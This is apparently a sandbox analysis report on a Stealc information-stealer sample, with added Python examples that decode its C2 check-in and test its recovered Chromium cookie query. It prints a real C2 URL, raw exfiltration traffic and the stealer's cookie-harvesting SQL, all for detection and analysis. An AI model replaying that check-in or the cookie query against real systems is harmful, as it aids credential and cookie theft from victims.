
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1522760
MD5: e9912f8bbba8a435c0770c5cb9dbdee2
SHA1: f323b850b002137ec47f291d928378245d4670fe
SHA256: f53185e3b9046b1c522d14dfed5988e0b4096cd5302e13a0d3e77207e014d797
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7640 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E9912F8BBBA8A435C0770C5CB9DBDEE2)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.1371291825.0000000005000000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1413525563.000000000116E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7640 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7640 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.4b0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata alerts (Timestamp | SID | Severity | Classtype | Source | Destination | Protocol):
2024-09-30T16:32:04.742514+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.9:49706 | 185.215.113.37:80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.4b0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: file.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49706 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HDHJEBFBFHJECAKFCAAK
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 37 37 43 45 30 30 32 37 30 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 2d 2d 0d 0a
    Data Ascii:
    ------HDHJEBFBFHJECAKFCAAK
    Content-Disposition: form-data; name="hwid"

    477CE00270C53528003197
    ------HDHJEBFBFHJECAKFCAAK
    Content-Disposition: form-data; name="build"

    doma
    ------HDHJEBFBFHJECAKFCAAK--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times; the C2 address is hard-coded, so no DNS lookup precedes the connection)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 with headers Host: 185.215.113.37, Connection: Keep-Alive, Cache-Control: no-cache (no User-Agent header; same request as listed above)
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 with the same headers and the same 211-byte multipart body (hwid, build) as the POST listed above (no User-Agent header)
Source: file.exe, 00000000.00000002.1413525563.000000000116E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1413525563.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php5
Source: file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php;
Source: file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpX
Source: file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpg
Source: file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpu
Source: file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
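The check-in above is the whole of the first exchange: a bare GET / to the hard-coded IP, then a multipart POST to the .php gate carrying only an hwid (hardware ID) and the build tag "doma" from the extracted configuration. The script below is an added example written for this page, not Joe Sandbox or Stealc code. It rebuilds the POST from the captured bytes in the Data Raw field, parses the multipart framing (note the boundary parameter in the header has four leading dashes while the delimiters in the body carry six, because RFC 7578 prefixes "--"), and applies a triage heuristic of this example's own devising that mirrors what the report flags: a .php endpoint, exactly the hwid/build pair, and no User-Agent header. The heuristic is not the text of the Suricata rule SID 2044243.

```python
"""Decode the Stealc C2 check-in captured in this report and flag it the way a triage
pipeline would. Added example; the heuristic is this example's own, not the ET/SEKOIA rule."""
import re

# Request line and headers exactly as shown in the captured POST.
CAPTURED_HEADERS = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----HDHJEBFBFHJECAKFCAAK\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
)
# The 211-byte body from the report's "Data Raw" field (bytes.fromhex ignores the spaces).
CAPTURED_BODY = bytes.fromhex(
    # ------HDHJEBFBFHJECAKFCAAK\r\n
    "2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a "
    # Content-Disposition: form-data; name="hwid"\r\n\r\n
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a "
    # 477CE00270C53528003197\r\n
    "34 37 37 43 45 30 30 32 37 30 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a "
    "2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a "
    # Content-Disposition: form-data; name="build"\r\n\r\n
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a "
    # doma\r\n
    "64 6f 6d 61 0d 0a "
    # ------HDHJEBFBFHJECAKFCAAK--\r\n
    "2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 2d 2d 0d 0a"
)


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("latin-1").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: value bytes} for a multipart/form-data body (RFC 7578 framing)."""
    delim = b"--" + boundary.encode("latin-1")   # header says ----X, body delimiters are ------X
    fields = {}
    for part in body.split(delim):
        # Skip the (empty) preamble and the "--\r\n" tail after the closing delimiter.
        if not part.strip(b"\r\n") or part.startswith(b"--"):
            continue
        part_head, _, part_body = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = re.search(rb';\s*name="([^"]*)"', part_head)   # "; name=", not "filename="
        if name is None:
            continue
        if part_body.endswith(b"\r\n"):       # the CRLF before the next delimiter is framing
            part_body = part_body[:-2]
        fields[name.group(1).decode("latin-1")] = part_body
    return fields


def extract_checkin(raw: bytes) -> dict:
    """Pull the bits a triage pipeline cares about out of one request."""
    method, path, headers, body = parse_http_request(raw)
    boundary = re.search(r"boundary=([^;]+)", headers.get("content-type", ""))
    fields = parse_multipart(body, boundary.group(1).strip()) if boundary else {}
    return {
        "method": method,
        "path": path,
        "host": headers.get("host"),
        "has_user_agent": "user-agent" in headers,
        "content_length_ok": headers.get("content-length") == str(len(body)),
        "fields": {k: v.decode("latin-1") for k, v in fields.items()},
    }


def looks_like_stealc_checkin(info: dict) -> bool:
    """This example's heuristic: POST to a .php gate, body is exactly hwid+build,
    hwid is an upper-case hex token, and the client sends no User-Agent at all."""
    f = info["fields"]
    return (
        info["method"] == "POST"
        and info["path"].endswith(".php")
        and set(f) == {"hwid", "build"}
        and re.fullmatch(r"[0-9A-F]{16,}", f["hwid"]) is not None
        and not info["has_user_agent"]
    )


if __name__ == "__main__":
    info = extract_checkin(CAPTURED_HEADERS + CAPTURED_BODY)
    print(info["fields"], "stealc-like:", looks_like_stealc_checkin(info))
```

Running it on the captured request yields the hwid 477CE00270C53528003197 and build "doma" (the same value the configuration extractor reports as the botnet tag). The absence of a User-Agent is the cheap network tell here; WinINet normally sends one unless the caller passes an empty agent string to InternetOpenA, which is consistent with the 0_2_004B4880 function listed above.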

System Summary

Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087E119
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084430B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00877C8F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008884A6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0072C431
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087FC41
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007794BA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0078E5D1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007255AD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071CE54
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00878EBB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008226C1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087C6F2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00884E44
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00889FB2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00886FC1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0088EF2B
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 004B45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: ceyxbmwp ZLIB complexity 0.9950204483489852
Source: file.exe | Static PE information: Entry point disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5, instruction diversity: 0.5
Source: file.exe, 00000000.00000003.1371291825.0000000005000000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\MZA1Y3YR.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.1413525563.000000000116E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies;^
Source: file.exe | ReversingLabs: Detection: 42%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Sections loaded (in order): apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1846272 > 1048576
Source: file.exe | Static PE information: Raw size of ceyxbmwp is bigger than: 0x100000 < 0x19ca00
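The SQL statement recovered from process memory is the stealer's Chromium cookie query, and it is worth reading closely: Chromium stores expires_utc as microseconds since 1601-01-01 UTC, so converting to Unix time means dividing by 1,000,000 and subtracting the 1601-to-1970 offset of 11,644,473,600 seconds. The constant baked into the malware is 11,644,480,800, which is 7,200 seconds too large, so every expiry it exfiltrates is two hours early (and session cookies, stored as 0, come out as a large negative number). The script below is an added example, not Stealc's or Joe Sandbox's code; it runs the recovered query verbatim against a constructed in-memory cookies table with only the columns the query touches, and beside it a corrected conversion. Column-name case (HOST_KEY vs host_key) does not matter to SQLite. The encrypted_value blob is left opaque; decrypting it is what the CryptUnprotectData calls listed under AV Detection are for and is out of scope here.

```python
"""Run the cookie query recovered from the Stealc memory dump against a constructed
Chromium-style cookies table and convert expires_utc properly. Added example only."""
import sqlite3
from typing import Optional

# Query as found in memory by the report (the trailing '^' in the dump is not part of it).
STEALC_COOKIE_QUERY = (
    "SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, "
    "name, encrypted_value from cookies;"
)

# Seconds from the Windows/Chromium epoch (1601-01-01 UTC) to the Unix epoch (1970-01-01 UTC).
EPOCH_DELTA = 11_644_473_600
# Constant hard-coded in the malware's query: 7200 s (two hours) more than the real delta,
# so every expiry it reports is two hours early.
STEALC_DELTA = 11_644_480_800


def chromium_to_unix(expires_utc: int) -> Optional[int]:
    """Chromium stores microseconds since 1601-01-01 UTC; 0 marks a session cookie."""
    if expires_utc == 0:
        return None
    return expires_utc // 1_000_000 - EPOCH_DELTA


def unix_to_chromium(unix_ts: int) -> int:
    return (unix_ts + EPOCH_DELTA) * 1_000_000


def build_sample_db() -> sqlite3.Connection:
    """Constructed sample data: only the columns the stealer's query touches."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE cookies (host_key TEXT, name TEXT, path TEXT, expires_utc INTEGER, "
        "is_secure INTEGER, is_httponly INTEGER, encrypted_value BLOB)"
    )
    rows = [
        # expires 2025-01-01T00:00:00Z; the blob stands in for the opaque encrypted value
        (".example.com", "sid", "/", unix_to_chromium(1_735_689_600), 1, 1, b"v10\x00sample-blob"),
        ("login.example.com", "tmp", "/", 0, 0, 0, b""),  # session cookie: expires_utc == 0
    ]
    conn.executemany("INSERT INTO cookies VALUES (?,?,?,?,?,?,?)", rows)
    conn.commit()
    return conn


def run_stealc_query(conn: sqlite3.Connection) -> dict:
    """What the malware gets back, keyed by host_key; index 4 is its expiry column."""
    return {row[0]: row for row in conn.execute(STEALC_COOKIE_QUERY)}


def run_corrected_query(conn: sqlite3.Connection) -> dict:
    """Same data with the expiry converted correctly (None for session cookies)."""
    rows = conn.execute("SELECT host_key, name, expires_utc, encrypted_value FROM cookies")
    return {h: (n, chromium_to_unix(e), ev) for h, n, e, ev in rows}


if __name__ == "__main__":
    db = build_sample_db()
    for host, row in run_stealc_query(db).items():
        print(host, "stealer expiry:", row[4], "correct:", run_corrected_query(db)[host][1])
```

For the constructed row expiring at 2025-01-01T00:00:00Z (Unix 1735689600) the malware's expression returns 1735682400, two hours earlier; the session cookie comes back as -11644480800. The two-hour offset is a useful fingerprint when you see this query in other samples, and a reminder not to treat timestamps in stealer logs as authoritative.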

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.4b0000.0.unpack | section rights: (unnamed):EW; .rsrc:W; .idata:W; (unnamed):EW; ceyxbmwp:EW; arpaejxu:EW; .taggant:EW vs (unnamed):ER; .rsrc:W; .idata:W; (unnamed):EW; ceyxbmwp:EW; arpaejxu:EW; .taggant:EW
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cfcb1 should be: 0x1d10d0
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: ceyxbmwp
Source: file.exe | Static PE information: section name: arpaejxu
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00906887 push 61066066h; mov dword ptr [esp], eax (at 0_2_009068AD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00721056 push 6A6A4725h; mov dword ptr [esp], edx (at 0_2_00721093)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0092E8A6 push eax; mov dword ptr [esp], ecx (at 0_2_0092E8E8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B540F8 push 093545A5h; mov dword ptr [esp], edx (at 0_2_00B54117)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B540F8 push edi; mov dword ptr [esp], 2D7EBB27h (at 0_2_00B54130)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B540F8 push ebp; mov dword ptr [esp], edx (at 0_2_00B54149)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B540F8 push 4BEB144Ah; mov dword ptr [esp], ecx (at 0_2_00B54160)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093F0CA push 19D5B468h; mov dword ptr [esp], ecx (at 0_2_0093F0F5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009760F6 push 7FB3F711h; mov dword ptr [esp], eax (at 0_2_00976124)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009760F6 push edi; mov dword ptr [esp], 1109440Eh (at 0_2_00976260)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004CB035 push ecx; ret (at 0_2_004CB048)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090A017 push edi; mov dword ptr [esp], 3963AA91h (at 0_2_0090A027)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090A017 push edx; mov dword ptr [esp], ecx (at 0_2_0090A08B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B7806 push eax; mov dword ptr [esp], 7BBED7DAh (at 0_2_008B7832)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B7806 push ebx; mov dword ptr [esp], 76FF3F43h (at 0_2_008B784F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007188C6 push edi; mov dword ptr [esp], ebp (at 0_2_0071583B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007188C6 push ecx; mov dword ptr [esp], 19F8AA5Ah (at 0_2_00717D26)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007188C6 push ecx; mov dword ptr [esp], 7BD344F1h (at 0_2_00718CA6)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093385D push edx; mov dword ptr [esp], ecx (at 0_2_00933884)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093385D push eax; mov dword ptr [esp], 1F7E48F7h (at 0_2_0093389D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A6047 push ecx; mov dword ptr [esp], 2FFC19B1h (at 0_2_009A605C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091D073 push eax; mov dword ptr [esp], 7066FDF2h (at 0_2_0091D09F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091D073 push 10224B75h; mov dword ptr [esp], ebp (at 0_2_0091D0D4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091D073 push 1D3406A5h; mov dword ptr [esp], esp (at 0_2_0091D136)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091D073 push eax; mov dword ptr [esp], 3CB72057h (at 0_2_0091D16D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094087D push 01DBC351h; mov dword ptr [esp], esi (at 0_2_00940B91)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095E860 push 0D5D38E2h; mov dword ptr [esp], eax (at 0_2_0095E899)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00984062 push ebp; mov dword ptr [esp], eax (at 0_2_00984756)
